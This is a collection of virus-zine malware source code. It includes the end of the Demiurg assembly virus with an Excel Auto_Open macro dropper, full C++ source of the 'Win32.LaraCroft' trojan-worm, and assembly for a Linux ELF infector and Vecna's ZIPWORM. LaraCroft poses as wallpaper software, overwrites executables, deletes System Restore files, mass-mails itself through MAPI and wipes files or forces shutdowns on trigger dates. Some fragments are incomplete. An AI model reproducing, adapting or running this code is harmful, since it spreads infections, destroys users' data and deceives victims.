db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h
db 00Dh, 00Ah, 044h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 03Dh, 032h, 032h, 02Ch, 020h, 032h, 032h
db 02Ch, 020h, 034h, 030h, 036h, 02Ch, 020h, 031h
db 039h, 031h, 02Ch, 020h, 05Ah, 00Dh, 00Ah, 0E6h
db 008h, 000h, 0FEh, 0FFh, 000h, 000h, 004h, 000h
db 002h, 0E6h, 011h, 000h, 001h, 000h, 000h, 000h
db 0E0h, 085h, 09Fh, 0F2h, 0F9h, 04Fh, 068h, 010h
db 0ABh, 091h, 008h, 000h, 02Bh, 027h, 0B3h, 0D9h
db 030h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
db 006h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
db 038h, 000h, 000h, 000h, 004h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 008h, 000h, 000h, 000h
db 04Ch, 000h, 000h, 000h, 012h, 000h, 000h, 000h
db 058h, 000h, 000h, 000h, 00Ch, 000h, 000h, 000h
db 070h, 000h, 000h, 000h, 013h, 000h, 000h, 000h
db 07Ch, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 0E4h, 004h, 000h, 000h, 01Eh, 000h, 000h, 000h
db 002h, 000h, 000h, 000h, 042h, 000h, 073h, 000h
db 01Eh, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 042h, 000h, 073h, 000h, 01Eh, 000h, 000h, 000h
db 010h, 000h, 000h, 000h, 04Dh, 069h, 063h, 072h
db 06Fh, 073h, 06Fh, 066h, 074h, 020h, 045h, 078h
db 063h, 065h, 06Ch, 000h, 040h, 000h, 000h, 000h
db 080h, 0ECh, 0E8h, 033h, 03Fh, 085h, 0BFh, 001h
db 003h, 0E6h, 013h, 000h, 0FEh, 0FFh, 000h, 000h
db 004h, 000h, 002h, 0E6h, 011h, 000h, 002h, 000h
db 000h, 000h, 002h, 0D5h, 0CDh, 0D5h, 09Ch, 02Eh
db 01Bh, 010h, 093h, 097h, 008h, 000h, 02Bh, 02Ch
db 0F9h, 0AEh, 044h, 000h, 000h, 000h, 005h, 0D5h
db 0CDh, 0D5h, 09Ch, 02Eh, 01Bh, 010h, 093h, 097h
db 008h, 000h, 02Bh, 02Ch, 0F9h, 0AEh, 008h, 001h
db 000h, 000h, 0C4h, 000h, 000h, 000h, 009h, 000h
db 000h, 000h, 001h, 000h, 000h, 000h, 050h, 000h
db 000h, 000h, 00Fh, 000h, 000h, 000h, 058h, 000h
db 000h, 000h, 017h, 000h, 000h, 000h, 064h, 000h
db 000h, 000h, 00Bh, 000h, 000h, 000h, 06Ch, 000h
db 000h, 000h, 010h, 000h, 000h, 000h, 074h, 000h
db 000h, 000h, 013h, 000h, 000h, 000h, 07Ch, 000h
db 000h, 000h, 016h, 000h, 000h, 000h, 084h, 000h
db 000h, 000h, 00Dh, 000h, 000h, 000h, 08Ch, 000h
db 000h, 000h, 00Ch, 000h, 000h, 000h, 0A1h, 000h
db 000h, 000h, 002h, 000h, 000h, 000h, 0E4h, 004h
db 000h, 000h, 01Eh, 000h, 000h, 000h, 001h, 0E6h
db 005h, 000h, 06Ch, 000h, 003h, 000h, 000h, 000h
db 06Ah, 010h, 008h, 000h, 00Bh, 0E6h, 007h, 000h
db 00Bh, 0E6h, 007h, 000h, 00Bh, 0E6h, 007h, 000h
db 00Bh, 0E6h, 007h, 000h, 01Eh, 010h, 000h, 000h
db 001h, 000h, 000h, 000h, 009h, 000h, 000h, 000h
db 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h
db 000h, 00Ch, 010h, 000h, 000h, 002h, 000h, 000h
db 000h, 01Eh, 000h, 000h, 000h, 009h, 000h, 000h
db 000h, 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h
db 06Eh, 000h, 003h, 000h, 000h, 000h, 001h, 0E6h
db 005h, 000h, 098h, 000h, 000h, 000h, 003h, 0E6h
db 007h, 000h, 020h, 000h, 000h, 000h, 001h, 000h
db 000h, 000h, 036h, 000h, 000h, 000h, 002h, 000h
db 000h, 000h, 03Eh, 000h, 000h, 000h, 001h, 000h
db 000h, 000h, 002h, 000h, 000h, 000h, 00Ah, 000h
db 000h, 000h, 05Fh, 050h, 049h, 044h, 05Fh, 047h
db 055h, 049h, 044h, 000h, 002h, 000h, 000h, 000h
db 0E4h, 004h, 000h, 000h, 041h, 000h, 000h, 000h
db 04Eh, 000h, 000h, 000h, 07Bh, 000h, 044h, 000h
db 039h, 000h, 045h, 000h, 034h, 000h, 036h, 000h
db 045h, 000h, 046h, 000h, 031h, 000h, 02Dh, 000h
db 046h, 000h, 031h, 000h, 033h, 000h, 041h, 000h
db 02Dh, 000h, 031h, 000h, 031h, 000h, 044h, 000h
db 033h, 000h, 02Dh, 000h, 041h, 000h, 035h, 000h
db 030h, 000h, 031h, 000h, 02Dh, 000h, 041h, 000h
db 036h, 000h, 046h, 000h, 033h, 000h, 044h, 000h
db 044h, 000h, 041h, 000h, 044h, 000h, 038h, 000h
db 032h, 000h, 033h, 000h, 039h, 000h, 07Dh, 0E6h
db 027h, 000h, 005h, 000h, 044h, 000h, 06Fh, 000h
db 063h, 000h, 075h, 000h, 06Dh, 000h, 065h, 000h
db 06Eh, 000h, 074h, 000h, 053h, 000h, 075h, 000h
db 06Dh, 000h, 06Dh, 000h, 061h, 000h, 072h, 000h
db 079h, 000h, 049h, 000h, 06Eh, 000h, 066h, 000h
db 06Fh, 000h, 072h, 000h, 06Dh, 000h, 061h, 000h
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
db 00Bh, 000h, 038h, 000h, 002h, 000h, 0E6h, 00Ch
db 0FFh, 0E6h, 024h, 000h, 0B1h, 000h, 000h, 000h
db 0A0h, 001h, 0E6h, 006h, 000h, 001h, 000h, 043h
db 000h, 06Fh, 000h, 06Dh, 000h, 070h, 000h, 04Fh
db 000h, 062h, 000h, 06Ah, 0E6h, 031h, 000h, 012h
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
db 000h, 0B8h, 000h, 000h, 000h, 068h, 0E6h, 04Bh
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 074h, 000h, 0E6h
db 00Ch, 0FFh, 0E6h, 030h, 000h, 001h, 000h, 0FEh
db 0FFh, 003h, 00Ah, 000h, 000h, 0E6h, 004h, 0FFh
db 020h, 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h
db 006h, 000h, 046h, 01Ch, 000h, 000h, 000h, 04Dh
db 069h, 063h, 072h, 06Fh, 073h, 06Fh, 066h, 074h
db 020h, 045h, 078h, 063h, 065h, 06Ch, 020h, 038h
db 02Eh, 030h, 02Dh, 054h, 061h, 062h, 065h, 06Ch
db 06Ch, 065h, 000h, 006h, 000h, 000h, 000h, 042h
db 069h, 066h, 066h, 038h, 000h, 00Eh, 000h, 000h
db 000h, 045h, 078h, 063h, 065h, 06Ch, 02Eh, 053h
db 068h, 065h, 065h, 074h, 02Eh, 038h, 000h, 0F4h
db 039h, 0B2h, 071h, 0E6h, 0FFh, 000h, 0E6h, 0A5h
db 000h
macro_dropper_size EQU ($ - macro_dropper)
main_macro_code:
db "Attribute VB_Name = ""Demiurg""", 0Dh, 0Ah
db "Public a", 0Dh, 0Ah
db "Sub Auto_Open()", 0Dh, 0Ah
db "Open ""C:\demiurg.exe"" For Binary As #1", 0Dh, 0Ah
db "b", 0Dh, 0Ah
db "c", 0Dh, 0Ah
db "d", 0Dh, 0Ah
db "e", 0Dh, 0Ah
db "f", 0Dh, 0Ah
db "g", 0Dh, 0Ah
db "Close #1", 0Dh, 0Ah
db "t=Shell(""C:\demiurg.exe"",vbNormalFocus)", 0Dh, 0Ah
db "End Sub", 0Dh, 0Ah
db "Sub w()", 0Dh, 0Ah
db "For i=0 To 127", 0Dh, 0Ah
db "v$=Chr$(a(i))", 0Dh, 0Ah
db "Put #1,,v$", 0Dh, 0Ah
db "Next", 0Dh, 0Ah
end_sub:
db "End Sub", 0Dh, 0Ah
main_macro_code_size EQU ($ - main_macro_code)
sub_header:
sub_name EQU byte ptr ($ + 4)
db "Sub b()", 0Dh, 0Ah
regkey db "Software\Microsoft\Office\8.0\Excel", 0
office_version_number EQU byte ptr (offset regkey+26)
subkey_97 db "Microsoft Excel", 0
subkey_2K db "Security", 0
subkey_InstallRoot db "InstallRoot", 0
regvalue_options db "Options6", 0
regvalue_2K db "Level", 0
regvalue_path db "Path", 0
demiurg_xls db "\xlstart\demiurg.xls", 0
macro_filename db "C:\demiurg.sys", 0
kernel32_dll db "\kernel32.dll", 0
dos_exe_size dd ?
resource_table dd ?
heap_buffer dd ?
dummy_dword dd ?
filename_ofs dd ?
attributes dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
filesize dd ?
filehandle dd ?
maphandle dd ?
mapbase dd ?
virus_RVA dd ?
virus_start dd ?
kernel32 dd 0
kernel32name db "KERNEL32", 0
GetModuleHandleA db "GetModuleHandleA", 0
l_GMH EQU $ - offset GetModuleHandleA
kernel32_API_names_table:
n_GlobalAlloc db "GlobalAlloc", 0
n_GlobalFree db "GlobalFree", 0
n_GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
n_GetSystemDirectoryA db "GetSystemDirectoryA", 0
n_lstrcatA db "lstrcatA", 0
n_LoadLibraryA db "LoadLibraryA", 0
n_CloseHandle db "CloseHandle", 0
n_GetFileSize db "GetFileSize", 0
n_GetFileTime db "GetFileTime", 0
n_SetFileTime db "SetFileTime", 0
n_SetEndOfFile db "SetEndOfFile", 0
n_SetFilePointer db "SetFilePointer", 0
n_CreateFileMappingA db "CreateFileMappingA", 0
n_MapViewOfFile db "MapViewOfFile", 0
n_UnmapViewOfFile db "UnmapViewOfFile", 0
n_WideCharToMultiByte db "WideCharToMultiByte", 0
number_of_hooked_APIs EQU 7
kernel32_API_address_table:
GlobalAlloc dd ?
GlobalFree dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
lstrcatA dd ?
LoadLibraryA dd ?
CloseHandle dd ?
GetFileSize dd ?
GetFileTime dd ?
SetFileTime dd ?
SetEndOfFile dd ?
SetFilePointer dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
WideCharToMultiByte dd ?
CreateFileA dd ?
GetFileAttributesA dd ?
SetFileAttributesA dd ?
CopyFileA dd ?
MoveFileExA dd ?
number_of_kernel32_APIs EQU (($ - kernel32_API_address_table) / 4)
advapi32_dll db "ADVAPI32.dll", 0
advapi32_API_names_table:
n_RegOpenKeyExA db "RegOpenKeyExA", 0
n_RegCreateKeyExA db "RegCreateKeyExA", 0
n_RegQueryValueExA db "RegQueryValueExA", 0
n_RegSetValueExA db "RegSetValueExA", 0
n_RegCloseKey db "RegCloseKey", 0
advapi32_API_address_table:
RegOpenKeyExA dd ?
RegCreateKeyExA dd ?
RegQueryValueExA dd ?
RegSetValueExA dd ?
RegCloseKey dd ?
number_of_advapi32_APIs EQU (($ - advapi32_API_address_table) / 4)
imagehlp_dll db "IMAGEHLP.dll", 0
CheckSumMappedFile db "CheckSumMappedFile", 0
virus_end:
.code
dummy_host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
end start
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.CPP]ÄÄÄ
#include "laracroft.h"
#pragma hdrstop
#pragma warning (disable: 4068)
#pragma warning (disable: 4001)
char LaraWinDir[256],LaraSysDir[256],LaraPath[256];
HKEY RestoreKey,LaraNTKey,LaraWinKey,LaraInstallKey,LaraNewKey;
HANDLE LaraHnd,LaraHndTime;
HMODULE ServiceLib,MessLib;
int Err,ErrSend;
typedef DWORD(*RegServProc)(DWORD,DWORD);
typedef ULONG(*FriendMess)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
typedef ULONG(*FriendFound)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
typedef ULONG(*FreeMem)(LPVOID);
LPSTR Friend = "a";
#pragma argsused
int PASCAL WinMain
(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
//Win32.LaraCroft par ZeMacroKiller98
//Copyright (c) 2000 par ZeMacroKiller98
//Un virus made in FRANCE!!!!!!!!!
WIN32_FIND_DATA LaraHost;
OSVERSIONINFO CurVerInfo;
FILETIME LaraCreateTime,LaraLstAccTime,LaraLstWriTime;
SYSTEMTIME LaraTime;
FriendMess MAPIFriendMess;
FriendFound MAPIFriendFound;
FreeMem MAPIFreeMem;
RegServProc RegisServProcss;
ServiceLib = LoadLibrary("kernel32.dll");
MessLib = LoadLibrary("mapi32.dll");
SearchPath(NULL,_argv[0],NULL,sizeof(LaraPath),LaraPath,NULL);
CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
GetVersionEx(&CurVerInfo);
if(CurVerInfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraNTKey);
RegSetValueEx(LaraNTKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraNTKey);
}
else
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&LaraWinKey);
RegSetValueEx(LaraWinKey,"LaraWallpaper",0,REG_SZ,LaraPath,sizeof(LaraPath));
RegCloseKey(LaraWinKey);
}
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",0,KEY_ALL_ACCESS,&
LaraInstallKey)!=ERROR_SUCCESS)
{
MessageBox(NULL,
"Hi Friends,\nThis software downloads automatically new wallpaper on Lara
Croft official site\nIf you have any questions, go to www.eidosinterative.com\nPlease
register it on our site at www.eidosinteractive.com\\Lara\\Register\n\tThanks to have take
this software\n\t\t\tLara Croft",
"Lara Wallpaper Download Software",
MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
//Anti-WinMe Restauration File
GetSystemDirectory(LaraSysDir, sizeof(LaraSysDir));
if(SetCurrentDirectory(lstrcat(LaraSysDir,"\\RESTORE"))!=0)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&RestoreKey);
RegDeleteValue(RestoreKey,"*StateMgr");
RegCloseKey(RestoreKey);
DeleteFile("rstrui.exe");
}
GetWindowsDirectory(LaraWinDir,sizeof(LaraWinDir));
SetCurrentDirectory(LaraWinDir);
LaraHnd = FindFirstFile("*.exe",&LaraHost);
LaraHoteTrouve:
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
GetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
if((lstrcmp(LaraHost.cFileName,"emm386.exe")==0)||(lstrcmp(LaraHost.cFileName,
"setver.exe")==0))
goto FichierNonInfecte;
CopyFile(_argv[0],LaraHost.cFileName,FALSE);
LaraHndTime = CreateFile(LaraHost.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
SetFileTime(LaraHndTime,&LaraCreateTime,&LaraLstAccTime,&LaraLstWriTime);
CloseHandle(LaraHndTime);
FichierNonInfecte:
if(FindNextFile(LaraHnd,&LaraHost)==TRUE)
goto LaraHoteTrouve;
FindClose(LaraHnd);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\LaraCroft\\Install",&LaraNewKey);
RegCloseKey(LaraNewKey);
MessageBox(NULL,"Please send this software about me to your friends...\nYou can
select friends into your address book, now\n\t\t\tLara Croft","Lara Wallpaper Download
Software",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
MAPIFriendMess = (FriendMess)GetProcAddress(MessLib,"MAPISendMail");
MAPIFriendFound = (FriendFound)GetProcAddress(MessLib,"MAPIResolveName");
MAPIFreeMem = (FreeMem)GetProcAddress(MessLib,"MAPIFreeBuffer");
if((MAPIFriendMess==NULL)||(MAPIFriendFound==NULL)||(MAPIFreeMem==NULL))
{
MessageBox(NULL,"MAPI not installed on this computer\nPlease refer to help
to install it","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory(LaraSysDir);
DeleteFile("*.*");
ExitProcess(0);
}
MapiMessage MyMessage;
MapiRecipDesc stRecip;
MapiFileDesc stFile;
lpMapiRecipDesc lpRecip;
stFile.ulReserved = 0;
stFile.flFlags = 0L;
stFile.nPosition = (ULONG)-1;
stFile.lpszPathName = LaraPath;
stFile.lpszFileName = NULL;
stFile.lpFileType = NULL;
UnResolve:
Err = (MAPIFriendFound)(lhSessionNull,0L,Friend,MAPI_DIALOG,0L,&lpRecip);
if(Err!=SUCCESS_SUCCESS)
{
switch(Err){
case MAPI_E_AMBIGUOUS_RECIPIENT:
MessageBox(NULL,"Please select new email address into your address
book","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_UNKNOWN_RECIPIENT:
MessageBox(NULL,"Any email address with current letter","Lara
Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_FAILURE:
MessageBox(NULL,"Unknown error into your address book","Lara
Wallpaper Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_INSUFFICIENT_MEMORY:
MessageBox(NULL,"No enought memory to launch this
application\nPlease close other application to continue","Lara Wallpaper Download Software",
MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_NOT_SUPPORTED:
MessageBox(NULL,"Email software not installed\nPlese refer to your
help for more information","Lara Wallpaper Download Software",MB_OK|MB_ICONSTOP|
MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_USER_ABORT:
MessageBox(NULL,"You have cancelled this dialog box","Lara Wallpaper
Download software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
}
goto UnResolve;
}
stRecip.ulReserved = lpRecip->ulReserved;
stRecip.ulRecipClass = MAPI_TO;
stRecip.lpszName = lpRecip->lpszName;
stRecip.lpszAddress = lpRecip->lpszAddress;
stRecip.ulEIDSize = lpRecip->ulEIDSize;
stRecip.lpEntryID = lpRecip->lpEntryID;
MyMessage.ulReserved = 0;
MyMessage.lpszSubject = "Lara Wallpaper Download Software";
MyMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI found on the net
a new interesting software about Lara Croft.\nI send you because it's very coooooool!!!\nTry
it and say me your opinion about it\n\n\tSee you soon and enjoy to have it")));
MyMessage.lpszMessageType = NULL;
MyMessage.lpszDateReceived = NULL;
MyMessage.lpszConversationID = NULL;
MyMessage.flFlags = 0L;
MyMessage.lpOriginator = NULL;
MyMessage.nRecipCount = 1;
MyMessage.lpRecips = &stRecip;
MyMessage.nFileCount = 1;
MyMessage.lpFiles = &stFile;
ErrSend = (MAPIFriendMess)(lhSessionNull,0L,&MyMessage,0L,0L);
if(ErrSend!=SUCCESS_SUCCESS)
{
MessageBox(NULL,"Sending email create error into your system","Lara Wallpaper
Download Software",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
}
FreeLibrary(MessLib);
}
RegCloseKey(LaraInstallKey);
RegisServProcss = (RegServProc)GetProcAddress(ServiceLib,"RegisterServiceProcess");
STARTUPINFO LaraStartInfo;
PROCESS_INFORMATION LaraProcInfo;
LaraStartInfo.cb = sizeof(STARTUPINFO);
LaraStartInfo.lpReserved = NULL;
LaraStartInfo.lpReserved2 = NULL;
LaraStartInfo.cbReserved2 = 0;
LaraStartInfo.lpDesktop = NULL;
LaraStartInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
if(CreateProcess(LaraPath,
NULL,
(LPSECURITY_ATTRIBUTES)NULL,
(LPSECURITY_ATTRIBUTES)NULL,
FALSE,
0,
NULL,
NULL,
&LaraStartInfo,
&LaraProcInfo))
{
CloseHandle(LaraProcInfo.hProcess);
CloseHandle(LaraProcInfo.hThread);
}
RegisServProcss(LaraProcInfo.dwProcessId,1);
if((LaraTime.wHour==10)&&(LaraTime.wMinute==0)&&(LaraTime.wSecond==0))
{
MessageBox(NULL,"It's time to connect at Lara Croft official web site\nThanks to
Click on OK to continue","Lara Wallpaper Download Software",MB_OK|MB_ICONEXCLAMATION|
MB_SYSTEMMODAL);
WritePrivateProfileString("InternetShortcut","URL",
"http://www.tombraider.com/larasworld/wallpaper.html","LaraCroft.url");
ShellExecute(NULL,"open","LaraCroft.url",NULL,NULL,SW_SHOWNORMAL);
}
if((LaraTime.wDay==25)&&(LaraTime.wMonth==12))
{
MessageBox(NULL,
"Merry christmas by Lara Croft!!!!!!\nHey, your PC is infected by new virus:
Win32.LaraCroft\n\nJoyeux Noel de la part de Lara Croft!!!!!!\nTon PC est infect‚ par
Win32.LaraCroft fabriqu‚ par ZeMacroKiller98",
"Lara Croft like you, don't you",
MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory("C:/");
DeleteFile("*.*");
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
}
if(LaraTime.wDay==1)
{
MessageBox(NULL,"Lara Croft is with you!!!!\nAnd don't want you work today....",
"Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
if((LaraTime.wHour>=20)&&(LaraTime.wHour<=6))
{
MessageBox(NULL,"Lara Croft say it's time to stop your PC now!!!!\nAnd go to bed, Ha
Ha Ha ha !!!!!","Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
FreeLibrary(ServiceLib);
return 0;
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.CPP]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.H]ÄÄÄ
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
#include <dos.h>
#include <stdlib.h>
#include <stdio.h>
#include <mapi.h>
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.H]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.TXT]ÄÄÄ
Name: Win32.LaraCroft
Size: 52736 octets
Author: ZeMacroKiller98
BITS 32
GLOBAL main
SECTION .text
vir_start:
main:
pushf
pushad
mov eax, vir_ends-vir_start
call delta
delta:
pop ebp
sub ebp,delta
db 0x0f,0x31 ; thx to AVP for this, nasm didn't compile rdtsc
; rdstc
and al,31
jnz no_activarse
mov eax,04ah ; Set Hostname
lea ebx,[Wintah+ebp]
mov ecx,0Ah
int 080h
no_activarse:
Sigue_Leyendo:
push ebx
lea ebx,[esp+0Ah+4] ; EBX -> file name
call Infectar
pop ebx
jmp Sigue_Leyendo
yanohaymas:
; Infection
Infectar:
cdq
inc edx
inc edx
mov ecx,edx
mov eax,5
int 080h
xchg ebx,eax
push ebx
mov eax,013h
loop $
int 080h
mov [esp+0Ch],eax
push ecx
push ebx
inc ecx
push ecx
inc ecx
inc ecx
push ecx
loop $
push eax
push ecx
mov ebx,esp
mov eax,0x5a
int 080h ; mmap(file)
add esp,4*6
mov dh,7
mov ebx,eax
cmp eax,0xFFFFF000 ; Same check as mmap.c does
jbe Continuar
j_cer:
jmp Close ; Failure? Bye...
Continuar:
mov eax,[esp+0Ch]
sub eax,04Ch
add eax,ebx
cmp [eax],dh
jnz j_cer
cmp word[eax+10h],(vir_ends-vir_start)
jb j_cer ; Big enough?
pop eax
sub eax,[ebx+098h]
add eax,dword[ebx+09Ch] ; Make new ep
mov byte [ebx+0ACh],dh
mov dword [ebx+18h],eax
ret
mov eax,1
int 080h
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WORM.S]ÄÄÄ
;ZIPWORM for Linux
;(c) Vecna 2000
BITS 32
;%define DEBUG 1
global main
extern izip_add
extern izip_maxaddsize
[section .data]
db "elf zip worm vecna", 0
nametable dd name01
dd name02
dd name03
dd name04
dd name05
dot db ".",0
name01 db "Ten motives why linux sux!",0
name02 db "Why Windows is superior to Linux!",0
name03 db "Is Linux for you? Never!",0
name04 db "Is Linux immune to virus? NO!",0
name05 db "zipworm!",0
%ifdef DEBUG
deb_msg0 times 80 db "-"
deb_msg4 db 0dh,0ah,0
deb_msg1 db "Running...",0dh,0ah,0
deb_msg2 db "Exiting to OS",0dh,0ah,0
deb_msg3 db "Opening: ",0
deb_msg5 db "Found worm!",0dh,0ah,0
deb_msg6 db "Worm size: ",0
deb_msg7 db "File search done",0dh,0ah,0
deb_msg8 db "File search init",0dh,0ah,0
deb_msg9 db "Worm in mem!",0dh,0ah,0
deb_msg10 db "Add size: ",0
%endif
mapstruct dd 0
mapsize dd 0
dd 3
dd 1
mapfilehnd dd 0
dd 0
[section .bss]
hostptr resd 1
hostsize resd 1
addsize resd 1
orgsize resd 1
dir_entry resb 0110h
hostbuffer resb 4000h
[section .text]
main:
%ifdef DEBUG
pushad
mov ecx, deb_msg1
call write_console
popad
%endif
cld
push byte 5
mov esi, nametable
pop ecx
.trynextname:
push ecx
lodsd
mov ebx, eax
%ifdef DEBUG
pushad
mov ecx, deb_msg3
call write_console
mov ecx, ebx
call write_console
mov ecx, deb_msg4
call write_console
popad
%endif
sub ecx, ecx
push byte 5h
pop eax
cdq
int 80h
mov ebx, eax
test eax, eax
pop ecx
jns .foundhost
loop .trynextname
jmp .exit
.foundhost:
%ifdef DEBUG
pushad
mov ecx, deb_msg5
call write_console
popad
%endif
cmp esi, dot
jb .no_name_adj
mov esi, nametable
.no_name_adj:
push byte 13h
push byte 2h
sub ecx, ecx
pop edx
pop eax
int 80h
mov [hostsize], eax
%ifdef DEBUG
pushad
mov ecx, deb_msg6
call write_console
mov eax, eax
call write_dword
popad
%endif
push byte 13h
sub ecx, ecx
pop eax
cdq
int 80h
mov ecx, hostbuffer
mov edx, [hostsize]
push byte 3
pop eax
int 80h ;read dropper
push byte 6
pop eax
int 80h ;close file
%ifdef DEBUG
pushad
mov ecx, deb_msg9
call write_console
popad
%endif
push dword [esi]
push dword [hostsize]
call izip_maxaddsize ;eax=size to increase .zip
mov [addsize], eax
%ifdef DEBUG
pushad
mov ecx, deb_msg10
call write_console
mov eax, eax
call write_dword
popad
%endif
push byte 5
mov ebx, dot
sub ecx, ecx
pop eax
cdq
int 80h
mov ebx, eax ;open current dir
%ifdef DEBUG
pushad
mov ecx, deb_msg8
call write_console
popad
%endif
.next_entry:
push byte 59h
mov ecx, dir_entry
pop eax
int 80h ;read directory entry
test eax, eax
jz near .done
pushad
lea ebx, [dir_entry+0ah]
movzx eax, word [dir_entry+8h]
cdq
mov dword [ebx+eax+1], edx ;put 0 marker
push byte 2
push byte 5h
pop eax
pop ecx
%ifdef DEBUG
pushad
mov ecx, ebx
call write_console
mov ecx, deb_msg4
call write_console
popad
%endif
int 80h
test eax, eax
js near .search_next
mov [mapfilehnd], eax
mov ebx, eax
push byte 93
mov ecx, eax
pop eax
int 80h
push byte 90
mov ebx, mapstruct
pop eax
int 80h
cmp eax, 0fffff000h
ja .closehandle
mov ebx, eax
push edi
push eax
push dword [esi]
push dword [hostsize]
mov eax, hostbuffer
push eax
call izip_add
test eax, eax
jz .clean
add [orgsize], eax
.clean:
push byte 91
pop eax
int 80h
push byte 93
mov ecx, [orgsize]
mov ebx, [mapfilehnd]
pop eax
int 80h
.closehandle:
push byte 6
mov ebx, [mapfilehnd]
pop eax
int 80h ;close file
.search_next:
popad
jmp .next_entry
.done:
%ifdef DEBUG
pushad
mov ecx, deb_msg7
call write_console
popad
%endif
.exit:
%ifdef DEBUG
pushad
mov ecx, deb_msg2
call write_console
popad
%endif
push byte 1
sub ebx, ebx
pop eax
int 80h
%ifdef DEBUG
;ecx=string
